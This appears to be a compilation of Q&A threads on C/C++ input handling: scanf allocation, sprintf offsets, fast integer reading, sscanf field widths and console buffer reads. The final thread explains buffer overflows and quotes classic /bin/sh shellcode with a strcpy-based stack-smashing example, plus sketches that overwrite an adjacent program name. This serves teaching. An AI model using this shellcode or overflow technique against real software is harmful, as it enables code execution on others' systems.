Dynamic allocation with scanf() - c++

My question is exactly the same as this one. That is, I'm trying to use scanf() to receive a string of indeterminate length, and I want scanf() to dynamically allocate memory for it.
However, in my situation, I am using VS2010. As far as I can see, MS's scanf() doesn't have an a or m modifier for scanning strings. Is there any way to do this (other than receiving input one character at a time)?

Standard versions of scanf() do not allocate memory for any of the variables it reads into.
If you've been hoodwinked into using a non-standard extension in some version of scanf(), you've just had your first lesson in how to write portable code - do not use non-standard extensions. You can nuance that to say "Do not use extensions that are not available on all the platforms of interest to you", but realize that the set of platforms may change over time.

Must you absolutely use scanf ? Aren't std::string s; std::cin >> s; or getline( std::cin, s ); an option for you?
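A minimal sketch of the std::getline route, assuming C++ streams are acceptable. The helper names read_line and first_line_of are made up for illustration. std::string grows as needed, so no maximum length has to be chosen up front.

```cpp
#include <cassert>
#include <istream>
#include <sstream>
#include <string>

// Hypothetical helper: reads one line of any length from `in`.
// Returns false when no more input is available.
bool read_line(std::istream& in, std::string& out)
{
    return static_cast<bool>(std::getline(in, out));
}

// Example of use on an in-memory stream (std::cin works the same way).
std::string first_line_of(const std::string& text)
{
    std::istringstream in(text);
    std::string line;
    const bool ok = read_line(in, line);
    assert(ok || line.empty());   // a failed read leaves the string empty
    return line;
}
```

Unlike %s, std::getline keeps embedded spaces and stops only at the newline.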

If you want to use scanf you could just allocate a large enough buffer to hold any possible value, say 1024 bytes, then use a maximum field width specifier one less than the buffer size (the width does not count the terminating null character).
The m and a modifiers are not part of the C standard (a is a GNU extension, m comes from POSIX.1-2008), so that's why Microsoft's compiler does not support them. One could wish that Visual Studio did.
Here is an example using scanf to read settings, and just print them back out:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

int
main( int argc, char **argv )
{   // usage ./a.out < settings.conf
    char *varname;
    int value, r, run = 1;

    // the cast is only needed when this is compiled as C++
    varname = (char *)malloc( 1024 );
    if( varname == NULL )
    {
        perror("malloc");
        return 1;
    }
    // clear errno
    errno = 0;
    while( run )
    {   // match any number of "variable = #number" and do some "processing"
        // the 1023 here is the maximum field width specifier; it leaves
        // one byte of the 1024-byte buffer for the terminating '\0'.
        r = scanf ( "%1023s = %d", varname, &value );
        if( r == 2 )
        {   // matched both string and number
            printf( " Variable %s is set to %d \n", varname, value );
        } else {
            // it did not, either there was an error in which case errno was
            // set or we are out of variables to match
            if( errno != 0 )
            {   // an error has occurred.
                perror("scanf");
            }
            run = 0;
        }
    }
    free( varname );
    return 0;
}
Here is an example settings.conf
cake = 5
three = 3
answertolifeuniverseandeverything = 42
charcoal = -12
You can read more about scanf on the manpages.
And you can of course use getline(), and after that parse character after character.
If you would go into a little more detail about what you are trying to achieve, you could maybe get a better answer.
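The getline() route mentioned above can be sketched as follows. This is only an illustration: the function name parse_settings is hypothetical, and it assumes each setting sits on its own line with whitespace around the '=' sign, as in the sample settings.conf.

```cpp
#include <cassert>
#include <istream>
#include <map>
#include <sstream>
#include <string>

// Parses lines of the form "name = number"; lines that do not match are skipped.
std::map<std::string, int> parse_settings(std::istream& in)
{
    std::map<std::string, int> settings;
    std::string line;
    while (std::getline(in, line)) {          // the line can be of any length
        std::istringstream fields(line);
        std::string name;
        char equals = '\0';
        int value = 0;
        if (fields >> name >> equals >> value && equals == '=') {
            assert(!name.empty());
            settings[name] = value;
        }
    }
    return settings;
}
```

Because std::string manages its own storage, no field width or buffer size appears anywhere in the parsing code.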

I think that, in the real world, one needs to have some maximum limit on the length of user input.
Then you may read the whole line with something like getline(). See http://www.cplusplus.com/reference/iostream/istream/getline/
Note that, if you want multiple input from user, you don't need to have separate char arrays for each of them. You can have one big buffer, e.g. char buffer[2048], for using with getline(), and copy the contents to a suitably allocated (and named) variable, e.g. something like char * name = strdup( buffer ).

Don't use scanf for reading strings. It probably doesn't even do what you think it does; %s reads only up until the next whitespace.
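To illustrate the whitespace behaviour, here is a small sketch using sscanf on an in-memory string (the helper name first_token is made up; the 16-byte buffer and matching width of 15 are arbitrary choices for the example).

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Returns what "%15s" extracts from `input`: leading whitespace is skipped,
// then at most 15 non-whitespace characters are stored.
std::string first_token(const char* input)
{
    char word[16] = "";                       // 15 characters plus '\0'
    const int matched = std::sscanf(input, "%15s", word);
    assert(matched == 1 || word[0] == '\0');  // nothing stored when nothing matched
    return word;
}
```

Calling first_token("hello world") yields only "hello"; the rest of the line stays unread.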

Related

Trouble Understanding sprintf with 'char * str + int'

I was looking at a project and came across the following code and am unable to figure out what the sprintf is doing in this context and was hoping someone might be able to help me figure it out.
char storage[64];
int loc = 0;
int size = 35;
sprintf(storage+(loc),"A"); //Don't know what this does
loc+=1;
sprintf(storage+(loc),"%i", size); //Don't know what this does
loc+=4;
sprintf(storage+(loc), "%i", start); //Don't know what this does
start += size;
loc += 3;
The code later does the following in another part
string value;
int actVal;
int index = 0;
for(int j = index+1; j < index+4; j++)
{
value += storage[j];
}
istringstream iss;
iss.str(value);
iss >> actVal; //Don't understand how this now contains size
The examples I have seen online regarding sprintf never covered that the above code was possible, but the program executes fine. I just can't figure out how the "+loc" affects storage in this instance and how the values would be saved/stored. Any help would be appreciated.
Ugly code! Regardless, for the first part, storage+(loc) == &storage[loc]. You end up with a string "A35\0<unknown_value>1234\0", assuming start = 1234, or in long form:
sprintf(&storage[0],"A");
sprintf(&storage[1],"%i", size);
sprintf(&storage[5], "%i", start);
For the second part, assuming we have the "A35\0<unknown_value>1234\0" above, the loop runs j from 1 to 3, so we get:
value += '3';
value += '5';
value += '\0';
So now value = "35" followed by an embedded '\0'. The loop stops before storage[4], so the <unknown_value> is never read. [1]
iss.str(value);
iss >> actVal;
This turns the string into an input stream and reads out the first string representing an integer, "35", and converts it into an integer, giving us basically actVal = atoi(value.c_str());.
Finally, according to this page, yes, reading an uninitialised ("indeterminate value" is the official term) array element is undefined behaviour and thus should be avoided, so code like this should never rely on what sits at storage[4].
[1] Note that the loop always copies exactly three characters, so it only recovers size when size prints as at most three digits; with a longer value the trailing digits would be silently dropped.
The function sprintf() works just like printf(), except the result is not printed to stdout; rather, it is stored in a character buffer. I suggest you read the sprintf() man page carefully:
https://linux.die.net/man/3/sprintf
Even if you are not on Linux, that function behaves much the same across platforms, be it Windows, Mac or other animals. That said, the piece of code you have presented seems to be unnecessarily complicated.
The first part could be written as:
sprintf(storage,"A %i %i", size, start);
For a similar-but-not-equal result, but then again, it all depends on what exactly the original programmer intended this storage area to hold. As Ken pointed out, there are some undefined bytes and behaviors coming from this code as-is.
From the reference documentation:
int sprintf ( char * str, const char * format, ... );
Write formatted data to string
Composes a string with the same text that would be printed if format was used on printf, but instead of being printed, the content is stored as a C string in the buffer pointed by str.
sprintf(storage+(loc),"A");
writes "A" into a buffer called storage. The storage+(loc) is pointer arithmetic: it specifies the index of the char array at which writing starts. With loc = 0, storage = "A".
sprintf(storage+(loc),"%i", size);
Here you're writing size into storage[1]. Now storage = "A35\0", loc = 1, and so on.
Your final value of storage = "A35\0<garbage><value of start>\0"
actVal: Don't understand how this now contains size
The for loop goes through storage[1] to storage[3] and builds up value from the contents of storage. value contains the characters '3', '5' and '\0'; when iss >> actVal extracts an integer, it stops at the first character that is not a digit, so only "35" is converted.
iss >> actVal
If you have come across std::cin, it's the same concept. The first string containing an integer value is written into actVal.
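As a sketch of a less fragile way to do the same kind of packing, the offset can be taken from snprintf's return value instead of hand-counted constants such as loc += 4. The function name pack_record and the space-separated layout are assumptions for illustration, not what the original project does.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdio>
#include <string>

// Appends formatted fields one after another into a fixed buffer.
// snprintf returns the number of characters written (excluding '\0'),
// which is exactly how far the write position has to advance.
std::string pack_record(int size, int start)
{
    char storage[64];
    std::size_t loc = 0;
    const int fields[] = {size, start};

    int written = std::snprintf(storage + loc, sizeof storage - loc, "A");
    assert(written == 1);
    loc += static_cast<std::size_t>(written);

    for (int field : fields) {
        // storage + loc is the same address as &storage[loc].
        written = std::snprintf(storage + loc, sizeof storage - loc, " %d", field);
        assert(written > 0 && static_cast<std::size_t>(written) < sizeof storage - loc);
        loc += static_cast<std::size_t>(written);
    }
    return std::string(storage, loc);
}
```

With size = 35 and start = 1234 this produces "A 35 1234", with no uninitialised bytes between the fields.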

Fastest way to read millions of integers from stdin C++?

I am working on a sorting project and I've come to the point where a main bottleneck is reading in the data. It takes my program about 20 seconds to sort 100,000,000 integers read in from stdin using cin and std::ios::sync_with_stdio(false); but it turns out that 10 of those seconds is reading in the data to sort. We do know how many integers we will be reading in (the count is at the top of the file we need to sort).
How can I make this faster? I know it's possible because a student in a previous semester was able to do counting sort in a little over 3 seconds (and that's basically purely read time).
The program is just fed the contents of a file with integers separated by newlines like $ ./program < numstosort.txt
Thanks
Here is the relevant code:
std::ios::sync_with_stdio(false);
int max;
cin >> max;
short num;
short* a = new short[max];
int n = 0;
while(cin >> num) {
a[n] = num;
n++;
}
This will get your data into memory about as fast as possible, assuming Linux/POSIX running on commodity hardware. Note that since you apparently aren't allowed to use compiler optimizations, C++ IO is not going to be the fastest way to read data. As others have noted, without optimizations the C++ code will not run anywhere near as fast as it can.
Given that the redirected file is already open as stdin/STDIN_FILENO, use low-level system call/C-style IO. That won't need to be optimized, as it will run just about as fast as possible:
// needs <sys/stat.h>, <unistd.h> and <cstdlib>
struct stat sb;
int rc = ::fstat( STDIN_FILENO, &sb );
// use C-style calloc() to get memory that's been
// set to zero as calloc() is often optimized to be
// faster than a new followed by a memset().
char *data = (char *)::calloc( 1, sb.st_size + 1 );
// st_size is a signed off_t; convert once to avoid signed/unsigned comparisons
size_t fileSize = (size_t)sb.st_size;
size_t totalRead = 0UL;
while ( totalRead < fileSize )
{
    ssize_t bytesRead = ::read( STDIN_FILENO,
        data + totalRead, fileSize - totalRead );
    if ( bytesRead <= 0 )
    {
        break;
    }
    totalRead += bytesRead;
}
// data is now in memory - start processing it
// data is now in memory - start processing it
That code will read your data into memory as one long C-style string. And the lack of compiler optimizations won't matter one bit as it's all almost bare-metal system calls.
Using fstat() to get the file size allows allocating all the needed memory at once - no realloc() or copying data around is necessary.
You'll need to add some error checking, and a more robust version of the code would check to be sure the data returned from fstat() actually is a regular file with an actual size, and not a "useless use of cat" such as cat filename | YourProgram, because in that case the fstat() call won't return a useful file size. You'll need to examine the sb.st_mode field of the struct stat after the call to see what the stdin stream really is:
::fstat( STDIN_FILENO, &sb );
...
if ( S_ISREG( sb.st_mode ) )
{
// regular file...
}
(And for really high-performance systems, it can be important to ensure that the memory pages you're reading data into are actually mapped in your process address space. Performance can really stall if data arrives faster than the kernel's memory management system can create virtual-to-physical mappings for the pages data is getting dumped into.)
To handle a large file as fast as possible, you'd want to go multithreaded, with one thread reading data and feeding one or more data processing threads so you can start processing data before you're done reading it.
Edit: parsing the data.
Again, preventing compiler optimizations probably makes the overhead of C++ operations slower than C-style processing. Based on that assumption, something simple will probably run faster.
This would probably work a lot faster in a non-optimized binary, assuming the data is in a C-style string read in as above:
char *next;
// base 10: with base 0, a value written with a leading zero would be read as octal
long count = ::strtol( data, &next, 10 );
long *values = new long[ count ];
for ( long ii = 0; ii < count; ii++ )
{
    values[ ii ] = ::strtol( next, &next, 10 );
}
That is also very fragile. It relies on strtol() skipping over leading whitespace, meaning if there's anything other than whitespace between the numeric values it will fail. It also relies on the initial count of values being correct. Again - that code will fail if that's not true. And because it can replace the value of next before checking for errors, if it ever goes off the rails because of bad data it'll be hopelessly lost.
But it should be about as fast as possible without allowing compiler optimizations.
That's what's crazy about not allowing compiler optimizations. You can write simple, robust C++ code to do all your processing, make use of a good optimizing compiler, and probably run almost as fast as the code I posted - which has no error checking and will fail spectacularly in unexpected and undefined ways if fed unexpected data.
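For comparison, a hedged sketch of what a more defensive strtol() loop might look like. The name parse_longs is hypothetical, and the code assumes the data is a '\0'-terminated buffer of whitespace-separated decimal integers; it treats the leading count as just another value.

```cpp
#include <cassert>
#include <cerrno>
#include <cstdlib>
#include <vector>

// Parses whitespace-separated decimal integers from a '\0'-terminated buffer.
// Returns false on the first token that is not a number or is out of range.
bool parse_longs(const char* text, std::vector<long>& out)
{
    assert(text != nullptr);
    const char* cursor = text;
    for (;;) {
        char* end = nullptr;
        errno = 0;
        const long value = std::strtol(cursor, &end, 10);
        if (end == cursor) {
            // Nothing was converted: acceptable only if just whitespace is left.
            while (*cursor == ' ' || *cursor == '\n' || *cursor == '\t' || *cursor == '\r')
                ++cursor;
            return *cursor == '\0';
        }
        if (errno == ERANGE)
            return false;                     // value does not fit in a long
        out.push_back(value);
        cursor = end;                         // advance only after the checks passed
    }
}
```

The extra comparisons cost a little per value, which is the trade-off against the unchecked loop.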
You can make it faster if you use a solid-state drive. If you want to ask something about code performance, you need to post how you are doing things in the first place.
You may be able to speed up your program by reading the data into a buffer, then converting the text in the buffer to internal representation.
The thought behind this is that all stream devices like to keep streaming. Starting and stopping the stream wastes time. A block read transfers a lot of data with one transaction.
Although cin is buffered, by using cin.read and a buffer, you can make the buffer a lot bigger than cin uses.
If the data has fixed width fields, there are opportunities to speed up the input and conversion processes.
Edit 1: Example
const unsigned int BUFFER_SIZE = 65536;
char text_buffer[BUFFER_SIZE];
//...
// Leave one byte free so the block can be '\0'-terminated for sscanf.
cin.read(text_buffer, BUFFER_SIZE - 1);
text_buffer[cin.gcount()] = '\0';
//...
int value1;
int arguments_scanned = sscanf(text_buffer, "%d", &value1);
The tricky part is handling the cases where the text of a number is cut off at the end of the buffer.
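One way to deal with numbers that straddle a block boundary is to keep the parser state outside the block loop. The following is a sketch under assumptions: the function name read_ints_chunked is made up, the input is taken to be whitespace-separated decimal integers, and overflow is not checked.

```cpp
#include <cassert>
#include <cstddef>
#include <istream>
#include <sstream>
#include <vector>

// Reads integers from `in` in blocks of `chunk_size` bytes. The current value,
// sign and "inside a number" flag survive from one block to the next, so a
// number split across two blocks is continued rather than cut in two.
std::vector<long> read_ints_chunked(std::istream& in, std::size_t chunk_size)
{
    assert(chunk_size > 0);
    std::vector<char> buffer(chunk_size);
    std::vector<long> values;
    long current = 0;
    bool negative = false;
    bool in_number = false;

    for (;;) {
        in.read(buffer.data(), static_cast<std::streamsize>(buffer.size()));
        const std::streamsize got = in.gcount();   // short on the last block
        if (got <= 0)
            break;
        for (std::streamsize i = 0; i < got; ++i) {
            const char c = buffer[static_cast<std::size_t>(i)];
            if (c >= '0' && c <= '9') {
                current = current * 10 + (c - '0');
                in_number = true;
            } else if (c == '-' && !in_number) {
                negative = true;
            } else {                               // separator ends the number
                if (in_number)
                    values.push_back(negative ? -current : current);
                current = 0;
                negative = false;
                in_number = false;
            }
        }
    }
    if (in_number)                                 // input did not end with a separator
        values.push_back(negative ? -current : current);
    return values;
}
```

A tiny chunk size such as 4 is useful for testing the boundary handling; in practice the block would be tens of kilobytes or more.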
Can you run this little test and compare it to your test, with and without the commented line?
#include <iostream>
#include <cstdlib>
int main()
{
std::ios::sync_with_stdio(false);
char buffer[20] {0,};
int t = 0;
while( std::cin.get(buffer, 20) )
{
// t = std::atoi(buffer);
std::cin.ignore(1);
}
return 0;
}
Pure read test:
#include <iostream>
#include <cstdlib>
int main()
{
std::ios::sync_with_stdio(false);
char buffer[1024*1024];
while( std::cin.read(buffer, 1024*1024) )
{
}
return 0;
}

When to quantify ignored pattern match in the C sscanf function

Cppcheck 1.67 raised a portability issue in my source code at this line:
sscanf(s, "%d%*[,;.]%d", &f, &a);
This is the message I got from it:
scanf without field width limits can crash with huge input data on some versions of libc.
The original intention of the format string was to accept one of three possible limiter chars between two integers, and today - thanks to Cppcheck[1] - I see that %*[,;.] accepts even strings of limiter chars. However I doubt that my format string may cause a crash, because the unlimited part is ignored.
Is there possibly an issue with a buffer overrun? ...maybe behind the scenes?
[1]
How to get lost between farsightedness and blindness:
I tried to fix it with %1*[,;.] (following some API doc), but Cppcheck still insisted on the issue, so I also tried %*1[,;.] with the same "success". It seems that I have to suppress it for now...
Congratulations on finding a bug in Cppcheck 1.67 (the current version).
You have basically three workarounds:
Just ignore the false positive.
Rework your format (assign that field, which is possible as you only want to match one character).
char tmp;
if(3 != sscanf(s, "%d %c%d", &f, &tmp, &a) || (tmp!=',' && tmp!=';' && tmp!= '.'))
    goto error;
Suppress the warning directly (preferably inline-suppressions):
//cppcheck-suppress invalidscanf_libc
if(2 != sscanf(s, "%d%*1[,;.]%d", &f, &a))
goto error;
Don't forget to report the error, as "defect / false positive", so you can retire and forget that workaround as fast as possible.
When to quantify ignored pattern match in the C sscanf function?
Probably it's a good idea to always quantify (see below), but over-quantification may also distract from your intentions. In the above case, where a single separator char has to be skipped, the quantification would definitely be useful.
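A small sketch of the quantified form, with the hypothetical helper name parse_pair. In a scanf conversion the suppression flag * comes before the field width, so "exactly one separator, discarded" is written %*1[,;.].

```cpp
#include <cassert>
#include <cstdio>

// Parses "<int><sep><int>" where <sep> is exactly one of ',', ';' or '.'.
// "%*1[,;.]" matches one character from the set and discards it.
bool parse_pair(const char* s, int& first, int& second)
{
    assert(s != nullptr);
    return std::sscanf(s, "%d%*1[,;.]%d", &first, &second) == 2;
}
```

With the width in place, "12;34" is accepted while "12;;34" is rejected, because the second ';' cannot start the second integer.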
Is there possibly an issue with a buffer overrun? ...maybe behind the scenes?
There will be no crashes caused by your code. To answer the "behind the scenes" question, I experimented with large input strings. In the C library I tested (the one shipped with Borland C++ 5.6.4), I could not trigger an internal buffer overrun, even with large inputs (more than 400 million chars).
Surprisingly, Cppcheck was not totally wrong - there is a portability issue, but a different one:
#include <stdio.h>
#include <assert.h>
#include <sstream>
int traced_sscanf_set(const int count, const bool limited)
{
const char sep = '.';
printf("\n");
std::stringstream ss;
ss << "123" << std::string(count, sep) << "456";
std::string s = ss.str();
printf("string of size %d with %d '%c's in it\n", (int)s.size(), count, sep);
std::stringstream fs;
fs << "%d%";
if (limited) {
fs << count;
}
fs << "*["<< sep << "]%d";
std::string fmt = fs.str();
printf("fmt: \"%s\"\n", fmt.c_str());
int a = 0;
int b = 0;
const int sscanfResult = sscanf(s.c_str(), fmt.c_str(), &a, &b);
printf("sscanfResult=%d, a=%d, b=%d\n", sscanfResult, a, b);
return sscanfResult;
}
void test_sscanf()
{
assert(traced_sscanf_set(0x7fff, true)==2);
assert(traced_sscanf_set(0x7fff, false)==2);
assert(traced_sscanf_set(0x8000, true)==2);
assert(traced_sscanf_set(0x8000, false)==1);
}
The library I checked internally limits the input consumed (and skipped) to 32767 (2^15 - 1) chars if there is no explicitly specified limit in the format parameter.
For those who are interested, here is the trace output:
string of size 32773 with 32767 '.'s in it
fmt: "%d%32767*[.]%d"
sscanfResult=2, a=123, b=456
string of size 32773 with 32767 '.'s in it
fmt: "%d%*[.]%d"
sscanfResult=2, a=123, b=456
string of size 32774 with 32768 '.'s in it
fmt: "%d%32768*[.]%d"
sscanfResult=2, a=123, b=456
string of size 32774 with 32768 '.'s in it
fmt: "%d%*[.]%d"
sscanfResult=1, a=123, b=0

ReadConsoleOutputCharacter gives ERROR_NOT_ENOUGH_MEMORY when requesting more than 0xCFE1 characters, is there a way around that?

the code:
#include <windows.h>
#include <stdio.h>
int main() {
system("mode 128");
int range = 0xCFE2;
char* buf = new char[range+1];
DWORD dwChars;
if (!ReadConsoleOutputCharacter(
GetStdHandle(STD_OUTPUT_HANDLE),
buf, // Buffer that receives the characters
range, // Number of characters to read
{0,0}, // Start reading at row=0, column=0
&dwChars // Number of characters actually read
)) {
printf("GetLastError: %lu\n", GetLastError());
}
system("pause");
return 0;
}
Console screen buffers cannot be larger than 64K. Each character in the buffer requires 2 bytes, one for the character code and another for the color attributes. It therefore never makes any sense to try to read more than 32K chars with ReadConsoleOutputCharacter().
You don't have a real problem.
The documentation for WriteConsole() says:
If the total size of the specified number of characters exceeds the available heap, the function fails with ERROR_NOT_ENOUGH_MEMORY.
ReadConsoleOutputCharacter() probably has a similar restriction if you try to read too much, even though it is not documented. Try using GetConsoleScreenBufferInfo() or similar function to determine how many rows and columns there are, and then don't read more than that.
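If the whole buffer really has to be read, one possible approach is to split it into several smaller requests. The sketch below covers only the portable bookkeeping: ReadChunk and plan_reads are hypothetical names, and the per-call limit is an assumption you would have to pick yourself. Width and height would come from the dwSize field filled in by GetConsoleScreenBufferInfo().

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// One read request: the cell to start at and how many cells to read.
struct ReadChunk {
    short column;
    short row;
    std::size_t length;
};

// Splits a width x height screen buffer into requests of at most max_cells
// cells each. A read that runs past the end of a row continues on the next
// row, so each chunk is described by its starting cell and its length.
std::vector<ReadChunk> plan_reads(std::size_t width, std::size_t height,
                                  std::size_t max_cells)
{
    assert(width > 0 && max_cells > 0);
    std::vector<ReadChunk> chunks;
    const std::size_t total = width * height;
    for (std::size_t offset = 0; offset < total; offset += max_cells) {
        const std::size_t remaining = total - offset;
        chunks.push_back({static_cast<short>(offset % width),
                          static_cast<short>(offset / width),
                          remaining < max_cells ? remaining : max_cells});
    }
    return chunks;
}
```

Each chunk would then be passed to ReadConsoleOutputCharacter() as a COORD of {column, row} plus the length, writing into the destination buffer at the running offset.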

Can you give an example of a buffer overflow?

I've heard so much about buffer overflows and believe I understand the problem but I still don't see an example of say
char buffer[16];
//code that will over write that buffer and launch notepad.exe
"Smashing The Stack For Fun And Profit" is the best HowTo/FAQ on the subject.
See: http://insecure.org/stf/smashstack.html
Here is a snip of some actual shellcode:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
First, you need a program that will launch other programs. A program that executes OS exec in some form or other. This is highly OS and language-specific.
Second, your program that launches other programs must read from some external source into a buffer.
Third, you must then examine the running program -- as laid out in memory by the compiler -- to see how the input buffer and the other variables used for step 1 (launching other programs) exist.
Fourth, you must concoct an input that will actually overrun the buffer and set the other variables.
So. Parts 1 and 2 are a program that looks something like this in C.
#include <someOSstuff>
char buffer[16];
char *program_to_run= "something.exe";
void main( char *args[] ) {
gets( buffer );
exec( program_to_run );
}
Part 3 requires some analysis of what the buffer and the program_to_run look like, but you'll find that it's probably just
\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 s o m e t h i n g . e x e \x00
Part 4, your input, then has to be
1234567890123456notepad.exe\x00
So it will fill buffer and write over program_to_run.
There are two separate things:
The code that overflows a buffer, this is easy to do and will most likely end with a segmentation fault. Which is what has been shown: sprintf(buffer,"01234567890123456789");
The means of placing code in the overwritten memory so that it gets executed. This is harder than merely overflowing a buffer, and is related to how programs are executed. A function's return address is usually stored on the stack; if you manage to overwrite it with a valid address without causing any other kind of corruption, you can create an exploit. It is usually done by making the overwritten return address point to a section of memory which contains code. This is why marking sections of memory as non-executable can help against these kinds of exploits.
Well, I don't know how to launch notepad.exe, but to overwrite this buffer simply do:
sprintf(buffer, "somestringlongerthan16");
int x[10];
x[11] = 1;
gets(buffer);
There is no way to use gets properly, as it doesn't ask for the size of the buffer.
scanf("%s", buffer);
scanf will read string input until it hits whitespace; if the user types 16 or more characters there will be a buffer overflow, because the terminating null character needs a byte too.
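For contrast, a sketch of the bounded counterpart to the sprintf() call above (copy_bounded is a made-up name). snprintf never writes more than the size it is given and reports how much room the full string would have needed. The same idea applies to input: fgets(buffer, sizeof buffer, stdin) or a width such as "%15s" keeps scanf within a 16-byte buffer.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdio>

// Copies `input` into `buffer` without ever writing more than `size` bytes.
// Returns true if the whole string fitted, false if it had to be truncated.
bool copy_bounded(char* buffer, std::size_t size, const char* input)
{
    assert(buffer != nullptr && size > 0);
    const int needed = std::snprintf(buffer, size, "%s", input);
    return needed >= 0 && static_cast<std::size_t>(needed) < size;
}
```

Passing "somestringlongerthan16" with a 16-byte buffer stores the first 15 characters plus '\0' and returns false instead of writing past the end.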
The way a buffer overflow can be used to make code do something other than intended, is by writing data outside the allocated buffer overwriting something else.
The overwritten data would typically be the code in another function, but a simple example is overwriting a variable next to the buffer:
char buffer[16];
string myapp = "appmine.exe";
void execMe(string s) {
for (int i = 0; i < s.Length; i++) buffer[i] = s[i];
Sys.Execute(myapp, buffer);
}
If you call the function with more data than the buffer can hold, it would overwrite the file name:
execMe("0123456789012345notepad");
Phrack's Smashing The Stack For Fun And Profit has enough explanation to enable you to do what you're asking.
For a simple example see also here:
Protecting Against Some Buffer-Overrun Attacks: An Example Attack
http://www.greenend.org.uk/rjk/random-stack.html